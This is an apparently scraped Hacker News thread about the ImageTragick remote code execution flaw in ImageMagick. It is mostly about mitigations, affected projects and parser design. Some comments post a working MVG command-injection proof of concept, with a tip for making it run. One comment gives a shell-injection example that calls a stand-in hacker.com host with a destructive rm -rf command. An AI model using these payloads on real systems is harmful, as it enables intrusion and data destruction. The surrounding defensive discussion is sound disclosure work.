16 ms·
Remote code execution vulnerability in ImageMagick
- Someone1234 10y agoPeople might be surprised how commonly used ImageMagick is. This could have a real world impact on a number of projects and services.
- cm3 10y agoI've been using GraphicsMagick for a while now. Is that also affected or is it just waiting to be checked for the same bugs?
- alexkavon 10y ago+1 to this. I use GraphicsMagick too and it would be great to know.
- caseyf 10y agoNo idea, but I'd assume yes for the time being. The Graphicsmagick code base includes 3 of the 5 coders that are mentioned (URL, MVG and MSL). 2 of those use LibXML and url.c suspiciously uses LibXML's nanoftp and nanohttp.
- xDranik 10y agoAny idea how to disable those coders with GraphicsMagick? ImageMagick supports a policy file to disable coders (mentioned here https://imagetragick.com/ https://imagetragick.com/). Would need to do the same for GraphicsMagick
- adrianmacneil 10y agoGeneral consensus so far seems to be that GraphicsMagick is unaffected by this vulnerability. If security is really important to you though, you should move image processing to separate isolated servers anyway, and verify magic bytes as described by this site.
- caseyf 10y agoQuick update: None of the 5 PoCs that were published work on GraphicsMagick for me. I was checking magic numbers before sending files to GraphicsMagick but I'm going to go through my code again and make sure that this is always happening.
- atilimcetin 10y agodelegates.mgk.in file of GraphicsMagick contains this comment: Under Unix, all text (non-numeric) substitutions should be surrounded with double quotes for the purpose of security, and because any double quotes occuring within the substituted text will be escaped using a backslash. Commands (excluding file names) containing one or more of the special characters ";&|><" (requiring that multiple processes be executed) are executed via the Unix shell with text substitutions carefully excaped to avoid possible compromise. Otherwise, commands are executed directly without use of the Unix shell. I assume GraphicsMagick doesn't suffer from this vulnerability.
- tyingq 10y agoPerhaps not the unescaped shell characters, but that's not the only hole that was found.
- nthitz 10y agoNo PoC, but ImageMagick commit history might lead to some clues https://github.com/ImageMagick/ImageMagick/commits/master https://github.com/ImageMagick/ImageMagick/commits/master edit: PoC here https://news.ycombinator.com/item?id=11624056 https://news.ycombinator.com/item?id=11624056 though I haven't ran it myself.
- kiallmacinnes 10y agoWow, they seem to have terrible commit message practice. The latest commit has a message of "...", and many others only have a bug number (which leads to an annoying usability issue on the github UI - I click the title to get to the commit - which now links to a GitHub issue). [EDIT: Actually, 8 of the commits top of tree as of writing are "...". wow.] On top of that, "Second effort to sanitize input string" at [1] appears related to this issue, and doesn't have a single test change, even on the second attempt! [1]: https://github.com/ImageMagick/ImageMagick/commit/a347456a1ef3b900c20402f9866992a17eb5d181 https://github.com/ImageMagick/ImageMagick/commit/a347456a1e...
- chippy 10y agoDon't they use SVN? http://www.imagemagick.org/script/subversion.php http://www.imagemagick.org/script/subversion.php Maybe github is just a mirror (edits - nope, looks like they changed recently. perhaps it's a reflection of developers moving from svn to git)
- derefr 10y agoCould this just be due to merges that don't squash commits?
- kiallmacinnes 10y agoNope, a very quick check shows very little merge activity - the occasional pull request. While I was at it, 49 commits using "..." as the message, and 8520 commits with absolutely no message at all.
- askyourmother 10y agoSo, we get it. Complicated file and network formats, handled in C code leads to these types of security issues. We are told that Rust will save us. Glib answer - if it was going to, it already would have (and this is from someone already writing Rust code). I hope it will lead to a change on two fronts: 1. Simpler formats for file representation and data interchange. When someone tries to add an extra bitfield option, say no. When they keep trying, get a wooden stick with "no" written on it. Part of the disease of modern computing is bloated specs. 2. Restrictive not permissive code bases. Exit and bail out early. Tell the user "file corrupted". Push back.
- quanticle 10y agoRegarding point 2, I think we need to consider Postel's Law a design antipattern, rather than a hallmark of good design. From now on, good software should not be permissive in what it accepts, because there is no good way to guarantee that such permissiveness will not lead to security breaches down the line.
- ArtDev 10y agoOh, this is scary. Drupal and Wordpress rely on Imagemagik. The amounts to a huge amount of the internet as a whole.
- unlinker 10y agoWhat doesn't? Imagemagick, for me, is the one stop shop for all kind of image filters, resizing, recoding, etc
- jandrese 10y agoIt's weird. I had to do commandline image manipulation in big batches several years ago. There were two options, netpbm and ImageMagick. I ended up using netpbm (and it's still my preferred solution) after ImageMagick proved to be buggy and much much slower. It always surprised me that people flocked to ImageMagick after that. I'm completely unsurprised about these bugs given the number of serious problems I ran into. Granted, that was something like 17 years ago, but these veteran projects have a tendency to hang around on life support for decades. Projects that are huge messes don't generally get cleaned up without massive outside pressure (see: openssl).
- hueving 10y ago>It always surprised me that people flocked to ImageMagick after that. It's an SEO thing. Searching "resize image" would almost always lead to ImageMagick examples that would work well enough to not require looking elsewhere. Almost every time I've used it, it's been for a few simple image operations (downsize, rotate, etc) that happen once on a user upload of a tiny site so performance wasn't a concern.
- Glyptodon 10y agoI've used GM more. For whatever reason I've had quite a few weird problems and performance issues with IM. (It's been quite a while, though.)
- eugeneionesco 10y agoNot true, both use the GD library.
- Yuioup 10y agoFirst Heartbleed, then Badlock and now ImageTragick. Are bugs getting their own domains now?
- jalami 10y agoI thought the same thing. You can't sensationalize hacking in the news though without a catchy name. I see them as eventual NerdCore band names. Don't forget Shellshock.
- acbabis 10y agoThe sad thing is, I would probably buy a Heartbleed CD
- golergka 10y agoWhatever helps awareness. May be it even gives a hint to people outside of tech about how bad things in security really are.
- Buge 10y agohttps://weakdh.org/ https://weakdh.org/ http://breachattack.com/ http://breachattack.com/ (an attack against https, ironically not even bothering to serve over https) https://freakattack.com/ https://freakattack.com/ https://factorable.net/ https://factorable.net/ http://badlock.org/ http://badlock.org/ https://drownattack.com/ https://drownattack.com/ https://poodle.io/ https://poodle.io/ http://backronym.fail/ http://backronym.fail/ https://gotofail.com/ https://gotofail.com/
- astrodust 10y agoIt's almost like we need a site that indexes them.
- discreditable 10y agoHere, I just made one! https://github.com/KeenRivals/Bugsite-Index https://github.com/KeenRivals/Bugsite-Index
- chippy 10y agoShouldn't there also be the HTTP coder included also? <policy domain="coder" rights="none" pattern="HTTP" /> Also - would an example of using a HTTPS coder be: convert https://example.com/rose.jpg https://example.com/rose.jpg ~/rose.png
- lobbybobby 10y agoPoC: save as file.mvg and then run convert file.mvg o.png viewbox 0 0 1 1 image over 0,0 0,0 'https://test/" https://test/" && touch /tmp/hacked && echo "1'
- dpritchett 10y agoThis is what I get on an unpatched staging server. Not sure it did anything... $ sudo convert file.mvg o.png convert.im6: delegate failed `"curl" -s -k -o "%o" "https:%M"' @ error/delegate.c/InvokeDelegate/1065. convert.im6: unable to open image `/tmp/magick-Yjc5q9f1': No such file or directory @ > error/blob.c/OpenBlob/2638. convert.im6: unable to open file `/tmp/magick-Yjc5q9f1': No such file or directory @ error/constitute.c/ReadImage/583.
- benmmurphy 10y agoif https://test https://test can't be opened by curl then the rest of the commands will fail because they are chained by &&. if you change the first && to || then it will work.
- 0x0 10y agoI assumed that "bug" was added intentionally as a script kiddie deterrence...
- dpritchett 10y agoCan confirm that I was able to reproduce after tweaking some of the special characters in the above PoC.
- 0x0 10y agoWorks for me (with a slight bugfix to the .mvg) :O The policy.xml workaround mentioned here seems to stop it https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-3714 https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-3714
- 10y ago
- deleted 10y ago[deleted]
- Illniyar 10y agoI love that security vulenarabilities have names now. I think it's great for awareness. But when you have magic in the software's name you could do better then ImageTragic. ... though none come to me right now
- roywiggins 10y agoMy Little Pwnie: System() is Magick Magick: The Pwning
- orf 10y agoSo judging by this commit[1] and this line[2] I reckon you could somehow escape the "wget" command (assuming that's what it invokes here[3]). The following characters were removed in the commit: ' ', '"', "'", '`', '<', '\\', '>'. If so then it's not complicated file formats or buffer overflows, it's an improperly escaped 'system' call being fed user input in an obscure feature that probably shouldn't have been included in the first place. Party like it's 1999 guys. Edit: I'm pretty sure this is an RCE issue. This function[4] replaces the placeholders in the wget command, which is this: `wget -q -O "%o" "https:%M"` So seeing as %M is user controlled we can feed it a URL like "//hacker.com/`rm -rf /`" and it will blindly pass it to the shell. Wow. 1. https://github.com/ImageMagick/ImageMagick/commit/a347456a1ef3b900c20402f9866992a17eb5d181 https://github.com/ImageMagick/ImageMagick/commit/a347456a1e... 2. https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L99 https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44... 3. https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L418 https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44... 4. https://github.com/ImageMagick/ImageMagick/blob/32bdefdc31f122591569ffa5085794565ff3b117/MagickCore/property.c#L3170 https://github.com/ImageMagick/ImageMagick/blob/32bdefdc31f1...
- x0x0 10y agowait, why wouldn't you want your image processing library to have the ability to run random processes / shell commands? Oof. In the meantime, maybe a DONT_RUN_COMMANDS ifdef around every call to fork/system/exec is merited...
- __david__ 10y agofork() and exec() are fine. As long as you aren't running arbitrary binaries, it's pretty hard to mess up (as far as RCE goes). system(), however, is a RCE foot-cannon just waiting to happen. Don't ever use system() unless every argument is static. And even then think long and hard.
- deleted 10y ago[deleted]
- trumpy123 10y agohttp://nowere.net/b/res/127615.html#i129473 http://nowere.net/b/res/127615.html#i129473 This russian forum may contain some clues.
- whizzkid 10y agoApparently Paperclip library already covered this long before this vulnerability is published. https://github.com/thoughtbot/paperclip/issues/2190#issuecomment-216638180 https://github.com/thoughtbot/paperclip/issues/2190#issuecom...
- deleted 10y ago[deleted]
- tyingq 10y agoWell, they check the filetype. I wouldn't be so certain that covers all the bases. Read this: http://www.openwall.com/lists/oss-security/2016/05/03/18 http://www.openwall.com/lists/oss-security/2016/05/03/18
- whizzkid 10y agoOf course I would like to see specific tests that covers everything about this vulnerability. I see now that there are more problems than the one mentioned in the article. But the link submitted to hackernews specifically mentioned "magic bytes" which is the file type problem. I think Paperclip is not affected on that one.
- rmdoss 10y agoHard problem now: Find all places where ImageMagick is being used and no one knows about.
- crb002 10y agoThat's easy. Replacing all the hoards of other handwritten input parsers with formal parsers is the task at hand. The new bounty will be for proofs of input parser correctness, not exploits.
- kodfodrasz 10y agoGiven pain to set up ImageMagick it probably cannot go unnoticed anywhere. Tried to use that crap as a library not so lately, but it gave me brain cancer. I sticked to libgd finally, as that is a library, no setup to /bin, /etc, or on Windows to C:\Progra~1, and the library entry points of GD don't look as if designed by an oh-so-funny idiot on the spectrum. http://www.imagemagick.org/script/magick-wand.php http://www.imagemagick.org/script/magick-wand.php MagickWandGenesis(); contrast_wand=NewMagickWand(); status=MagickReadImage(contrast_wand,argv[1]); Tell me please, that this is a sane API, but then please provide me your github account as well, just to know what to avoid at all costs in the future Edit: USE LIBGD: http://libgd.github.io/ http://libgd.github.io/ it has friendly API, suggesting sane developers, and the API is easy to use from wrappers (I used with P/Invoke interop from C# without any hickups). It looks to me that it was designed in a way to be easily usable that way, which suggests design, not just growing code like cancer.
- yanowitz 10y agoFor Heroku, which has a read-only filesystem for /etc, we did this: https://gist.github.com/yanowitz/8329d8b27d8294ca7027f504326fd629 https://gist.github.com/yanowitz/8329d8b27d8294ca7027f504326...
- steveeq1 10y agoIt seems that heroku already took care of this security problem for us. This is a copy-and-paste of a comment that was left on the github page: seems to be the default on heroku already: Path: /etc/ImageMagick/policy.xml Policy: Coder rights: None pattern: EPHEMERAL Policy: Coder rights: None pattern: URL Policy: Coder rights: None pattern: HTTPS Policy: Coder rights: None pattern: MVG Policy: Coder rights: None pattern: MSL
- evolve2k 10y agoAm I right then in assuming then that for apps deployed on heroku that this specific reported issue is not a problem?
- steveeq1 10y agoWell, I am on heroku and I have verified that that file is on my heroku instance, so I assume so. Is there a tool I can use to verify that my website is protected?
- crb002 10y agoRule of the day. Ad hock parsers are the #1 infosec issue. AFL is the Killer Rabbit. The only defense is writing formal parsers on all inputs.
- SFJulie 10y agoMost images file format are insane. And people expect to convert insane document format to images, too. Well. What did you expected?
- fidz 10y agoI wonder why we are "trademarking" security issue since Heartbleed?
- netheril96 10y agoOtherwise no one cares.
- shthed 10y agoEasier to remember and talk about, I'm not going to remember CVE-2016–3714 but ImageTragick is catchy.
- wim 10y agoAlso make sure you don't use it for any image formats that are processed by logic with the complexity of a small command-line interpreter. You'll risk a lot of XXE vulns with formats like SVG or MVG. To see some examples of said logic, have a look at 'convert -list delegate', for example.
- bru 10y agoFull story by one of the 2 finders on the oss-security@openwall mailing list: http://www.openwall.com/lists/oss-security/2016/05/03/18 http://www.openwall.com/lists/oss-security/2016/05/03/18
- tyingq 10y agoWould recommend reading the mailing list entry above...it has much more detail than the imagetragick.com site. The "unescaped shell characters" is only one of many issues.
- dorfsmay 10y agoI wonder if the same issue exist in GraphicsMagick. Also, I am surprised how few people have switched from ImageMagick to graphocksMagic, given that the fork happened back in 2002 and that it offers significant improvements. http://www.graphicsmagick.org/ http://www.graphicsmagick.org/
- Danack 10y ago"it offers significant improvements." - citation needed. It was better for a period after the fork, but the only guy working on it hasn't maintained it that well...there's a significant number of bugs in GraphicsMagick that have been there for years.
- Anthony-G 10y agoI've always chosen GraphicsMagick over ImageMagick because it has far fewer dependencies on other packages and it provides the features I want.
- rmdoss 10y agoDetails here: http://www.openwall.com/lists/oss-security/2016/05/03/18 http://www.openwall.com/lists/oss-security/2016/05/03/18
- zerocrates 10y agoThe particularly interesting piece to me is the SVG exploit. ImageMagick apparently will try to load xlink'd images referenced from within the SVG and hit the same problem as in the MVG example. No skin off anybody's nose if they have to block MVGs, but SVG could be somewhat of a loss.
- rbut 10y agoWe are currently facing the issue of not being able to use MSVG (ImageMagick's internal SVG renderer). We use it to work around issues with RSVG. If anyone has a solution for disabling xlink'd images but retaining the rest of MSVG functionality, we'd be all ears.
- zerocrates 10y agoThe "policy.xml" mitigation mentioned in the link (absent MVG, which is required to use MSVG) does seem to fix the specific remote execution bug being discussed here, just because the https delegate can't be used. But, it doesn't resolve the problem that the internal renderer can be used to read local files and include their contents in the rendered image through the xlink:href. It's not clear to me that there's any way to disable that. The ImageMagick forum post gives an additional policy entry to "prevent indirect reads" but it doesn't seem to have that effect (unless it also requires an updated ImageMagick). Edit: It... maybe... looks like the "indirect reads" mitigation was very narrowly targeted at the CVE-2016-3717 PoC using "label:@" but that's far from the only way to do local reads once you've got ImageMagick parsing "URLs" inside your input file (hint: there's a txt: coder). I'm honestly not totally sure what that policy is intended to do... Edit 2: Well, it appears that the "prevent indirect reads" policy does indeed require an updated ImageMagick: "Denying indirect reads with a path policy and a pattern of "@*" is supported in ImageMagick 6.9.3-10 and ImageMagick 7.0.1-1 for those that need to utilize the MVG and MSL coders." I haven't used that version but I still think, judging from what it looks like, that it won't really solve the problem.
- rbut 10y agoHas anyone determined if Python Wand is affected also? http://wand-py.org http://wand-py.org Edit: Or any other libmagickwand based project for that matter.
- jhealy 10y agoFor our use case, the only input formats we need to support are GIF, JPG and PNG. Using policy.xml to disable EPHEMERAL, URL, HTTPS, MVG and MSL is a nice start, but is it also possible to disable PDF, open office, FTP and others? Where would I find a list of all the supported coders?
- philsnow 10y agoI'm on my phone at the moment but try looking in the files named by the output of "dpkg -L imagemagick-common". There's a bunch of xml files and one of them specifies how all the other commands are invoked, IIRC.
- jhealy 10y agoThe delegates.xml file looks interesting, and `convert -list delegate` lists a large number of formats that we don't need to support. I'm not clear on the difference between a "coder" and a "delegate". Do I need to add a policy.xml entry to for each delegate?
- nodesocket 10y agoDoes anybody have a library (prefer JavaScript) for inspecting files and extracting the file type using "magic bytes"[1]. Seems like most people probably blindly use mime-type, which appears to be incorrect and insecure. [1] https://en.wikipedia.org/wiki/List_of_file_signatures https://en.wikipedia.org/wiki/List_of_file_signatures
- steveax 10y agohttps://github.com/sindresorhus/file-type https://github.com/sindresorhus/file-type
- deleted 10y ago[deleted]
- jackcosgrove 10y agoWould using a libmagic based tool to detect the magic bytes and content type be a valid mitigation strategy? The Node library mmmagic (https://github.com/mscdex/mmmagic https://github.com/mscdex/mmmagic) already does this.
- djadmin 10y agoWordPress's Imagick Image Editor would be a problem?
- nerdy 10y agoExploit samples: http://www.theregister.co.uk/2016/05/04/imagemagick_exploits_in_the_wild/?utm_content=buffer408c4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer http://www.theregister.co.uk/2016/05/04/imagemagick_exploits...
- sucuri2 10y agoWe posted some more details here: https://blog.sucuri.net/2016/05/imagemagick-remote-command-execution-vulnerability.html https://blog.sucuri.net/2016/05/imagemagick-remote-command-e...